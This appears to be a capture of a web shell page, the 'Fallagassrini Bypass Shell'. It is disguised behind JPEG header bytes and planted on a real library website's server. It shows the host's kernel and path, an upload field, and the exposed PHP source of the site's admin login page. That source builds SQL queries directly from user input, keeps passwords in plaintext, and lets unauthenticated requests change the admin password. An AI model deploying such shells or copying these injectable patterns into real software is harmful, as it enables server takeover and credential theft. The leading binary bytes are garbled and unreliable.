JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/signtest.php

<?Php
session_start();
error_reporting(E_ALL & ~E_NOTICE);
/*include('ip-block.php');*/
include('config.php');

function get_branchname($id)
{
$book_id=mysql_fetch_row(mysql_query("select name from branches where id='".$id."'"));	
return $book_id[0];
}
if(isset($_REQUEST['login']))
{
    
    $error='';
	$qry="SELECT * FROM admin where username='".$_POST['usrname']."' and password='".$_POST['pwd']."'";
	$rs=mysql_query($qry);
	$n1=mysql_num_rows($rs);
	
	if($n1==1)
	{
	$qry=mysql_fetch_array(mysql_query("SELECT * FROM admin where username='".$_POST['usrname']."' and password='".$_POST['pwd']."'"));
    $_SESSION['user_name']=$_POST['usrname'];
	$_SESSION['password']=$_POST['pwd'];
	if($qry['is_admin']==1)
	{
	$_SESSION['is_admin']=1;
	$_SESSION['branch']=0;
	$_SESSION['branch_name']='Super Admin';
	}
	else
	{
	$_SESSION['is_admin']=0;
	$_SESSION['sub_admin']=$qry['modules'];
	$_SESSION['branch']=$qry['branch'];
	$_SESSION['branch_name']=get_branchname($qry['branch']);
	}
	//$allowed_ips = "122.165.167.34";
	//$allowed_ips = "42.111.129.209";
$allowed_ips = array("122.165.171.71","122.165.171.80","122.165.167.34","122.165.171.85","122.165.171.83","122.165.171.81","122.165.171.84","122.165.172.30","122.165.169.9","182.65.50.152","182.65.246.72","122.165.167.39","182.65.244.139","42.111.129.209");

// set the loops to 0 before we start the check 
 $a = 0;
 $i = 0;
 // start checking the ip numbers to see if they are allowed
while ($allowed_ips[$i] !== null)
{
if ($allowed_ips[$i] === $_SERVER['REMOTE_ADDR'])
{ 
$a=$a+1;
}
$i=$i+1;
}
if ($a == 0)   {
 echo ("Sorry, you do not have access to this section");
 exit();
}
else
{
 header("Location:http://easwarilibrary.in/llm/index.php");
}
}
 else
	 {
       $error="No match for Username and/or Password.";
	   echo '<script>alert("No match for Username and/or Password.");</script>';
	 }
}

if(isset($_REQUEST['add']))
{
mysql_query("update admin set password='".$_POST['password']."' where id='1'");
$_SESSION['password']=$_POST['password'];
?>


/*$allowed_ips = "122.165.167.34";

// set the loops to 0 before we start the check 
 $a = 0;
 $i = 0;
 
 // start checking the ip numbers to see if they are allowed

if ($allowed_ips === $_SERVER['REMOTE_ADDR'])
{
//echo $_SERVER['REMOTE_ADDR']; 
//$a=$a+1;

 
 header("Location:http://easwarilibrary.in/llm/index.php");


}
 // $i=$i+1;
 else
 {
echo '<script>alert("Sorry, you do not have access to this section.");</script>';
 } 


// if ip address is not found send them somewhere else ...
*/
<script language="javascript" type="text/javascript">
alert("Password has been Changed");
window.location.href="index.php";
</script>

<!--<script language="javascript" type="text/javascript">
window.location.href="index.php";
</script>-->
<?php	 	

//header('Location:view_receptionist.php');
}
?>
<!DOCTYPE html>
<html lang="en">
	
<!-- Mirrored from jesus.gallery/cloud2/login.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:42 GMT -->
<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Library Login Page</title>
		
		<!-- Error CSS -->
		<link href="css/login.css" rel="stylesheet" media="screen">

		<!-- Animate CSS -->
		<link href="css/animate.css" rel="stylesheet" media="screen">

		<!-- Font Awesome -->
		<link href="fonts/font-awesome.min.css" rel="stylesheet">
	</head>
	<body>
		<form method="post" id="login" name="login">
			<div id="box" class="animated bounceIn">
				<div id="top_header">
					<!--<a href="#">
						<img class="logo" src="img/logo.png" alt="logo">
					</a>-->
					<h5>
						Sign in 
					</h5>
				</div>
				<di id="inputs">
					<div class="form-control">
						<input type="text" placeholder="Email" name="usrname" id="usrname">
						<i class="fa fa-envelope-o"></i>
					</div>
					<div class="form-control">
						<input type="password" placeholder="Password" name="pwd" id="pwd">
						<i class="fa fa-key"></i>
					</div>
					<input type="submit" name="login" id="login" value="Sign In">
				</di>
				<div id="bottom">
					<div class="squared-check">
						<input type="checkbox" value="None" id="remember" name="check" checked="">
						<label for="remember"></label>
						<div class="cb-label">Remember</div>
					</div>
					<a href="#" onClick="showchange();">Change Password</a>
					<!--<a class="right_a" href="#">Forgot password?</a>-->
				</div>
			</div>
		</form>
		
		<form name="changepassword" method="post" id="changepassword" onSubmit="validate();"  style="display:none">
						  <!--<label><?php echo $msg_display;?><?php echo $msg_display1;?></label>-->
			               <div id="box" class="animated bounceIn">
				<div id="top_header">
					<!--<a href="#">
						<img class="logo" src="img/logo.png" alt="logo">
					</a>-->
					<h5>
						Change Password
					</h5>
				</div>
				<div id="inputs">
						   <div class="form-control">
						     <label for="exampleInputEmail1" class="control-label">New Password</label>
						<input type="password" placeholder="Password" name="password" id="password">
					</div>
						   
						   <div class="form-control">
						     <label for="exampleInputEmail1" class="control-label">Confirm Password</label>
						<input type="password" placeholder="Confirm Password" name="cpassword" id="cpassword">
					</div>
					<input type="submit" name="add" value="Change"   class="btn btn-success" />
					</div>
						   <!-- <div class="control-group">
			                  <label for="exampleInputEmail1" class="control-label">New Password</label>
							   <div class="controls">
				 <input type="password"  name="password" id="password">
							  </div>
			                 </div>
							 
							  <div class="control-group">
			                  <label for="exampleInputEmail1" class="control-label">Confirm Password</label>
							   <div class="controls">
				 <input type="password"  name="cpassword" id="cpassword">
							  </div>
			                 </div>-->
							 
			                <div class="checkbox">
			                </div>
							<!-- <div class="form-actions" align="center">
							<input type="submit" name="add" value="Change"   class="btn btn-success" />
			                </div>-->
							
			              </form>
						  
<script type="text/javascript">
function showchange()
{
document.getElementById("login").style.display="none";
document.getElementById("changepassword").style.display="block";
}
</script>
<script language="javascript">
function validate()
{
if(document.changepassword.password.value=='')
{
alert("Please Enter the Password");
document.changepassword.password.focus();
//return false;
}else if(document.changepassword.cpassword.value=='')
{
alert("Please Enter the Confirm Password");
document.changepassword.cpassword.focus();
//return false;
}else if(document.changepassword.cpassword.value!=document.changepassword.password.value)
{
alert("Confirm Password is not matching with new password");
document.changepassword.cpassword.focus();
//return false;

}

}
</script>
						  
	</body>

<!-- Mirrored from jesus.gallery/cloud2/login.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:43 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net